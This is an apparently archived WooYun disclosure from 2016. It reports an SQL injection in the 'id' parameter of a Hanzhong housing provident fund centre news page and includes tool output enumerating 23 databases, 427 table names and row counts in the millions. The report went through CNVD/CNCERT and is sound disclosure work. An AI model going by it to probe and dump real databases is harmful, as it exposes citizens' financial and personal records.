当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171831

漏洞标题:陕西省某市住房公积金管理中心SQL注影响500+万人信息安全

相关厂商:陕西省住房资金管理中心

漏洞作者: abb

提交时间:2016-01-22 09:53

修复时间:2016-03-08 21:29

公开时间:2016-03-08 21:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-22: 细节已通知厂商并且等待厂商处理中
2016-01-26: 厂商已经确认,细节仅向厂商公开
2016-02-05: 细节向核心白帽子及相关领域专家公开
2016-02-15: 细节向普通白帽子公开
2016-02-25: 细节向实习白帽子公开
2016-03-08: 细节向公众公开

简要描述:

RT

详细说明:

汉中市住房公积金管理中心

http://**.**.**.**/Website/newsshow.jsp?id=346


注入参数:id

11.png


12.png


available databases [23]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GJJMX12
[*] GJJMX13
[*] HR
[*] HZGJJWZ
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

13.png


Database: GJJMX12
[427 tables]
+---------------------------+
| PARAMETER |
| 结果 |
| AA10 |
| AA11 |
| AA12 |
| AAGZBJK |
| AAGZJKK |
| AAGZPZK |
| AAGZRDK |
| AAGZZGPZK |
| AAGZZYK |
| APP_DBTRACE |
| APP_REPORT |
| APP_REPORT_DK |
| APP_ROLE |
| APP_SIGN |
| APP_USER |
| BM_A003 |
| BM_A003_NDHD |
| BM_A005 |
| BM_A015 |
| BM_A071 |
| BM_A073 |
| BM_A075 |
| BM_A093 |
| BM_A095 |
| BM_A097 |
| BM_A168 |
| BM_A174 |
| BM_B012 |
| BM_B031 |
| BM_BGCL |
| BM_C006 |
| BM_CLIENT |
| BM_CXLX |
| BM_D006 |
| BM_DBFS |
| BM_DKDA |
| BM_DKLX |
| BM_DKSPJB |
| BM_DKSPSC |
| BM_DKTJ |
| BM_DKZGTJ |
| BM_DYDB |
| BM_DYLX |
| BM_E007 |
| BM_E007_BGQK |
| BM_E007_GZQK |
| BM_E007_SPWJ |
| BM_E009 |
| BM_E013 |
| BM_FCPG |
| BM_FKYH |
| BM_FWTX |
| BM_FZXM |
| BM_G067 |
| BM_G068 |
| BM_G069 |
| BM_G070 |
| BM_G071 |
| BM_G094 |
| BM_G095 |
| BM_G096 |
| BM_G125 |
| BM_G139 |
| BM_G161 |
| BM_G171 |
| BM_GJSPJB |
| BM_GJZGY |
| BM_GZQK |
| BM_HJSX |
| BM_HKFS |
| BM_HZDW |
| BM_JBRY |
| BM_KHCL |
| BM_KMDY |
| BM_LDDB |
| BM_LSDA |
| BM_LSSW |
| BM_P012 |
| BM_P015 |
| BM_SPWJ |
| BM_SRXM |
| BM_SSGX |
| BM_SSQX |
| BM_STYH |
| BM_TQCL |
| BM_TQFW |
| BM_TQSPSC |
| BM_TXJY |
| BM_WSZC |
| BM_WTDW |
| BM_XGCL |
| BM_XHCL |
| BM_XHYY |
| BM_XHZM |
| BM_XTCS |
| BM_XTZB |
| BM_YWGN |
| BM_YWMK |
| BM_ZCXM |
| BM_ZFLX |
| BM_ZGBM |
| BM_ZGHY |
| BM_ZGXL |
| BM_ZGZC |
| BM_ZGZW |
| BM_ZGZY |
| BM_ZJGS |
| BM_ZJLX |
| BM_ZXDJ |
| BM_ZXJG |
| BM_ZXZB |
| BM_ZXZBBZ |
| BM_ZYDB |
| BM_ZYZG |
| BM_ZZXM |
| DABH |
| GJJ_JHDL |
| GZBGK |
| GZBGK_BAK |
| GZBGK_DWQC |
| GZBGK_JBQK |
| GZBJK |
| GZBMBGK |
| GZDKBGK |
| GZDKBGSHK |
| GZDKCQK |
| GZDKFXK |
| GZDKK |
| GZDKK_CL |
| GZDKLLK |
| GZDKZXK |
| GZDWBGK |
| GZDWJCBGK |
| GZDWJCBGSPK |
| GZFXK |
| GZFYK |
| GZGJK |
| GZHBK |
| GZHKK |
| GZHKZHBGK |
| GZJBK |
| GZJBK_DWQC |
| GZJBK_LMKDR |
| GZJBK_LMKHD |
| GZJBK_LMKSQ |
| GZJBK_NDHD |
| GZJCRSTJK |
| GZJCZTK |
| GZJKK |
| GZJKK_BAK |
| GZJKK_DWDJ |
| GZJZFCTJK |
| GZJZK |
| GZLLK |
| GZLSK |
| GZNDK |
| GZPZK |
| GZPZK_BAK |
| GZRDK |
| GZRDK_BAK |
| GZRZK |
| GZSHBGK |
| GZSHDQBGK |
| GZSHDQBGSPK |
| GZSHK |
| GZSHK_LY |
| GZSHK_ZP |
| GZSHLSDAJJMXK |
| GZSHLSDAK |
| GZSHYJK |
| GZSQDAK |
| GZSQDAK_DZTP |
| GZTQK |
| GZTZK |
| GZXMK |
| GZYHJEBGK |
| GZZCKZQK |
| GZZGKLK |
| GZZGPZK |
| GZZQK |
| GZZQK_ZCTQ |
| GZZQSPK |
| GZZQZMCLBGK |
| GZZQZMCLK |
| GZZRK |
| GZZTZYK |
| GZZYK |
| GZZYTJK |
| JCK |
| LOG_ERR |
| LYBJK |
| LYRDK |
| MENU_ITEM |
| MODULE_FUNC |
| NEWS |
| NEWS_COMMENT |
| NEWS_FJK |
| NZCW |
| NZPZ |
| PLAN_TABLE |
| TELDK |
| TELGJJ |
| TELRECORD |
| TMP_DKHKJHCX |
| TMP_DKHKMXCX |
| TMP_DKSQQKCX |
| TMP_DKYWQKHZCX |
| TMP_DKYWQKMXCX |
| TMP_DPTBGCX |
| TMP_DPTBGCX1 |
| TMP_DPTBGCX1_GG |
| TMP_DPTBGCX2 |
| TMP_DPTBGCX2_GG |
| TMP_DPTBGCX_GG |
| TMP_DPTBGHZCX |
| TMP_DPTCKYECALC |
| TMP_DPTDATACHK1 |
| TMP_DPTDATACHK2 |
| TMP_DPTDATACHK3 |
| TMP_DPTDBYWCX_GJ |
| TMP_DPTDKCJCX |
| TMP_DPTDKFFTJCX |
| TMP_DPTDKFFTJCX1 |
| TMP_DPTDKFFTJCX2 |
| TMP_DPTDKQJMXCX |
| TMP_DPTDKQJMXCX1 |
| TMP_DPTDKQJMXCX2 |
| TMP_DPTDKZJHZCX |
| TMP_DPTDWLXDCX |
| TMP_DPTDWLXDCX1 |
| TMP_DPTDWMXCX |
| TMP_DPTGJQKFXCALC1 |
| TMP_DPTGJQKFXCALC2 |
| TMP_DPTGJQKFXCALC3 |
| TMP_DPTGJQKFXQCCX |
| TMP_DPTGJQKFXTJCX |
| TMP_DPTGJQKFXTJCX_CW |
| TMP_DPTGJQKQCCX |
| TMP_DPTGJTQQKCALC1 |
| TMP_DPTGJTQQKCALC2 |
| TMP_DPTGJTQQKCALC3 |
| TMP_DPTGJTQQKCALC6 |
| TMP_DPTGJTQQKCALC_TQ1 |
| TMP_DPTGJTQQKCALC_TQ2 |
| TMP_DPTGJTQQKTJCX |
| TMP_DPTGJZGYDWQJHZCX |
| TMP_DPTGJZGYDWYJHZCX |
| TMP_DPTGJZGYDYGZHZCX |
| TMP_DPTGJZGYDYGZHZCX1 |
| TMP_DPTGJZGYDYGZHZCX2 |
| TMP_DPTGJZGYDYHJHZCX |
| TMP_DPTGJZGYWDGJHZCX |
| TMP_DPTHJJZFPQKCX |
| TMP_DPTHJQKTJCX1 |
| TMP_DPTHJQKTJCX2 |
| TMP_DPTHJQKTJCX3 |
| TMP_DPTJCCX |
| TMP_DPTJCCX1 |
| TMP_DPTJZQKCX |
| TMP_DPTNDHDQKTJCX |
| TMP_DPTRJSZMXCX1 |
| TMP_DPTRJSZMXCX11 |
| TMP_DPTRJSZMXCX12 |
| TMP_DPTRJSZMXCX2 |
| TMP_DPTRJSZMXCX21 |
| TMP_DPTRJSZMXCX22 |
| TMP_DPTRJSZMXCX23 |
| TMP_DPTRJSZMXCX24 |
| TMP_DPTRJSZMXCX25 |
| TMP_DPTRJSZMXCX26 |
| TMP_DPTRJSZMXCX3 |
| TMP_DPTRJZQQKCX |
| TMP_DPTSZRBMXCX |
| TMP_DPTSZRBMXCX1 |
| TMP_DPTTJQKCX |
| TMP_DPTTJQKCX1 |
| TMP_DPTTJQKCX2 |
| TMP_DPTTQNDHZQKCX |
| TMP_DPTTQNDHZQKCX1 |
| TMP_DPTTQQKMXCX |
| TMP_DPTTQQKQCCX |
| TMP_DPTTQQKTJCX |
| TMP_DPTTQQKTJCX_1 |
| TMP_DPTWDCSXQCCX |
| TMP_DPTWDCSXQCCX1 |
| TMP_DPTWDGJQCCX |
| TMP_DPTWDGJQCCX1 |
| TMP_DPTWDKHQCCX |
| TMP_DPTWDKHQCCX1 |
| TMP_DPTWDKHQCCX2 |
| TMP_DPTWDNDGJQKCX |
| TMP_DPTWDQJQCCX |
| TMP_DPTWDQJQCCX1 |
| TMP_DPTWDYWMXCX |
| TMP_DPTWDZCKQCCX |
| TMP_DPTWRZYWCX |
| TMP_DPTYHSZMXCX |
| TMP_DPTYWHZCX |
| TMP_DPTYWMXCX |
| TMP_DPTZCKYECALC |
| TMP_DPTZDZZ_ADD1 |
| TMP_DPTZDZZ_ADD2 |
| TMP_DPTZGQCCX |
| TMP_DPTZQQKHZCX |
| TMP_DPTZQSPQKCX_1 |
| TMP_DPTZQSPQKHZCX_2 |
| TMP_DPTZQZYMXCX |
| TMP_DPTZXGJDWQKCX |
| TMP_DPTZXGJQKCX |
| TMP_DPTZXGRYCJEPMCX |
| TMP_DPTZXHJQKCX |
| TMP_DPTZXHJQKCX1 |
| TMP_DPTZXJCQKPMCX |
| TMP_DPTZXJCQKPMCX1 |
| TMP_DPTZXJCTQQKTJCX |
| TMP_DPTZXJCTQQKTJCX_WD |
| TMP_DPTZXTQQKCX |
| TMP_DPTZXYJQKCX |
| TMP_DPTZXYJQKCX1 |
| TMP_DPTZXZGBMGJQKCX |
| TMP_DPTZZXXCX |
| TMP_DPTZZ_CALC |
| TMP_DWJBXX |
| TMP_DWJXDZDXX |
| TMP_DWJXDZDXX_BJ |
| TMP_DWJXDZDXX_BJ_GG |
| TMP_DWKHXX |
| TMP_DWKHXX1 |
| TMP_DWMXXX |
| TMP_DWMXXX_GGJH |
| TMP_DWTCZJZHXX |
| TMP_DWTCZJZHXX1 |
| TMP_DWZZXX |
| TMP_DWZZXX_GGJH |
| TMP_DWZZXX_GGJH_1 |
| TMP_DYWHDKCX |
| TMP_DZMXCX |
| TMP_DZMXCX1 |
| TMP_DZMXCX2 |
| TMP_EMPLOYEEDKSQ_DKSPCALC |
| TMP_EMPLOYEEGRYWMXCX |
| TMP_EMPLOYEEJSBGQCCX |
| TMP_EMPLOYEEMXCX |
| TMP_EMPLOYEEMXCX_CZ |
| TMP_EMPLOYEENDHDQCCHK |
| TMP_EMPLOYEEZQQKMXCX |
| TMP_EMPLOYEEZQQKMXCX_TQCL |
| TMP_EMPLOYEEZZYE_CALC |
| TMP_EMPLOYEEZZYE_CALC1 |
| TMP_EMPLOYEEZZ_CALC |
| TMP_EMPLYOEEDPTBMQKCX |
| TMP_GJJKHCKXXHZ |
| TMP_GJJKHCKXXHZ1 |
| TMP_GRCXZHXX |
| TMP_GRDKCX |
| TMP_GRFZXX |
| TMP_GRJBXX |
| TMP_GRJXDZDXX |
| TMP_GRJXDZDXX_BJ |
| TMP_GRJXDZDXX_BJ_GG |
| TMP_GRMXXX |
| TMP_GRMXXX_GGJH |
| TMP_GRTQSXXX |
| TMP_GRZZXX |
| TMP_GRZZXX_GGJH |
| TMP_GZPZK |
| TMP_JSQYSJ |
| TMP_KMBM |
| TMP_LXJS_BJ |
| TMP_LXJS_SC |
| TMP_LXJS_SC_1 |
| TMP_LXJS_ZQ |
| TMP_LXJS_ZR |
| TMP_NZQDWLXCX |
| TMP_PLHKYHMXCX |
| TMP_REPORT_01 |
| TMP_REPORT_02 |
| TMP_REPORT_03 |
| TMP_REPORT_03_01 |
| TMP_REPORT_04 |
| TMP_REPORT_05 |
| TMP_REPORT_06 |
| TMP_REPORT_07 |
| TMP_REPORT_08 |
| TMP_REPORT_10 |
| TMP_REPORT_11 |
| TMP_TABLE |
| TMP_YWRJXX |
| TMP_ZFGJJDWQKTJCX |
| TMP_ZFGJJDWQKTJCX1 |
| TMP_ZFGJJGRDKQKTJCX |
| TMP_ZFGJJGRDKQKTJCX1 |
| TMP_ZFGJJGRDKQKTJCX2 |
| TMP_ZFGJJGRDKQKTJCX3 |
| TMP_ZFGJJGRDKQKTJCX_1 |
| TMP_ZFGJJGRDKQKTJCX_1_1 |
| TMP_ZFGJJGRDKQKTJCX_1_2 |
| TMP_ZFGJJGRDKQKTJCX_1_3 |
| TMP_ZFGJJGRDKQKTJCX_1_4 |
| TMP_ZFGJJGRQKTJCX |
| TMP_ZFGJJRHGRDKQKTJCX_YH |
| TX_DKFFK |
| TX_DKHKK |
| TX_DKHKK_YH |
| TX_DKHK_YHMXK |
| TX_DKHK_YHYEK |
| TX_GJKHMXK |
| TX_LMKDZK |
| TX_LMKZKXXK |
| TX_RZK |
| TX_TQKHDZK |
| TX_TQKHMXK |
| TX_YHDZK |
| TX_ZJDZK |
| USER_COOKIE |
| USER_ROLE |
| V_DWQK |
| V_GJJDK |
| V_GJJJC |
| V_GRCKLL |
| V_GRDK |
| V_GRDKLL |
| V_GRJB |
| V_GRTQMX |
| ZCKBAK |
+---------------------------+

14.png


Database: GJJMX12
+---------------+---------+
| Table | Entries |
+---------------+---------+
| GZRZK | 4889129 |
| GZZGPZK | 4195737 |
| GZJCZTK | 1091325 |
| GZBJK | 1033541 |
| APP_DBTRACE | 980131 |
| GJJ_JHDL | 885473 |
| GZHKK | 372511 |
| GZJBK | 278656 |
| GZPZK | 268825 |
| GZBGK | 200359 |
| TX_DKHK_YHMXK | 141567 |
| GZBGK_BAK | 91660 |
| BM_G096 | 61916 |
| GZZGKLK | 58241 |
| GZJCRSTJK | 48857 |
。。。。。。。省略

15.png


16.png


漏洞证明:

同上

修复方案:

过滤

版权声明:转载请注明来源 abb@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-01-26 15:39

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给陕西分中心,由其后续协调网站管理单位处置.

最新状态:

暂无